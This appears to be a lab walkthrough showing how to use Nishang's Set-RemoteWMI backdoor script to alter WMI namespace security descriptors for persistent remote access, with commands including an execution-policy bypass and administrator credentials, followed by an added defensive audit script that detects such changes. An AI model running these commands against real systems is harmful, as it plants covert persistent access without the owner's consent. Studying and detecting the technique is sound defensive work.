Security Descriptor

This allows a particular user or group to access WMI namespaces with the same privileges as an administrator:

PS C:\Users\victim6\Downloads> cd .\new\new\tool\tool\nishang-master\nishang-master\Backdoors\

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> . .\Set-RemoteWMI.ps1

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Set-RemoteWMI -UserName victim6 -verbose

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Set-RemoteWMI -UserName administrator -ComputerName 192.168.222.144 -Credential SECURITY\administrator -verbose

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> powershell -ep bypass

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> . .\Set-RemoteWMI.ps1

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> help set-remotewmi -Examples

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Set-RemoteWMI -UserName administrator -ComputerName 192.168.222.144 -Credential SECURITY\administrator -verbose

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Set-RemoteWMI -UserName administrator -ComputerName 192.168.222.144 -Credential SECURITY\administrator -verbose -remove

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Get-WmiObject -class win32_computersystem -ComputerName 192.168.222.144

Set-RemoteWMI.ps1 from Nishang:

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Set-RemoteWMI -UserName administrator -namespace 'root\cimv2' -verbose -notallnamespaces

To remove the user's entries:

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Set-RemoteWMI -UserName administrator -verbose -remove

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Set-RemoteWMI -username administrator -ComputerName 192.168.222.144 -Credential SECURITY\administrator -verbose -namespace root\cimv2 -notallnamespaces

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Set-RemoteWMI -username administrator -ComputerName 192.168.222.144 -Credential SECURITY\administrator -verbose -namespace root\cimv2 -notallnamespaces -remove
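To check a host for the kind of change shown above, the audit below (an added example, not part of the original post or of Nishang) reads each WMI namespace's security descriptor and flags allow ACEs that grant Remote Enable to a trustee outside a baseline. The function name Get-WmiNamespaceAce and the baseline SID list are assumptions made for this example; it covers only the WMI namespace DACL and expects Windows PowerShell 5.1 in an elevated session.

```powershell
# Added audit example; not Nishang code.
# Assumption: these well-known SIDs are the only trustees expected on WMI namespaces.
$ExpectedSids = @(
    'S-1-5-32-544',  # BUILTIN\Administrators
    'S-1-5-11',      # NT AUTHORITY\Authenticated Users
    'S-1-5-19',      # NT AUTHORITY\LOCAL SERVICE
    'S-1-5-20'       # NT AUTHORITY\NETWORK SERVICE
)

function Get-WmiNamespaceAce {
    param(
        [string]$Namespace = 'root',
        [string]$ComputerName = '.'
    )
    $common = @{ Namespace = $Namespace; ComputerName = $ComputerName }
    try {
        # __SystemSecurity.GetSecurityDescriptor returns the namespace descriptor.
        $sd = Invoke-WmiMethod @common -Path '__SystemSecurity=@' `
            -Name GetSecurityDescriptor -ErrorAction Stop
    } catch {
        Write-Warning "Cannot read security descriptor of ${Namespace}: $_"
        return
    }
    if ($sd.ReturnValue -ne 0) {
        Write-Warning "GetSecurityDescriptor returned $($sd.ReturnValue) for $Namespace"
        return
    }
    foreach ($ace in $sd.Descriptor.DACL) {
        [pscustomobject]@{
            Namespace    = $Namespace
            Trustee      = "$($ace.Trustee.Domain)\$($ace.Trustee.Name)"
            Sid          = $ace.Trustee.SIDString
            Allow        = ($ace.AceType -eq 0)                # 0 = access allowed
            AccessMask   = '0x{0:X}' -f $ace.AccessMask
            RemoteEnable = [bool]($ace.AccessMask -band 0x20)  # WBEM_REMOTE_ACCESS
            Inherited    = [bool]($ace.AceFlags -band 0x10)    # INHERITED_ACE
            Unexpected   = $ExpectedSids -notcontains $ace.Trustee.SIDString
        }
    }
    # Walk child namespaces so ACEs set below the root are also listed.
    Get-WmiObject @common -Class __Namespace -ErrorAction SilentlyContinue |
        ForEach-Object {
            Get-WmiNamespaceAce -Namespace "$Namespace\$($_.Name)" -ComputerName $ComputerName
        }
}

# Show allow ACEs that grant remote access to a trustee outside the baseline.
Get-WmiNamespaceAce -Namespace 'root' |
    Where-Object { $_.Unexpected -and $_.Allow -and $_.RemoteEnable } |
    Format-Table Namespace, Trustee, Sid, AccessMask, Inherited -AutoSize
```

Some namespaces legitimately carry additional trustees, so compare hits against a known-good host before treating them as tampering.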

@Saksham Dixit
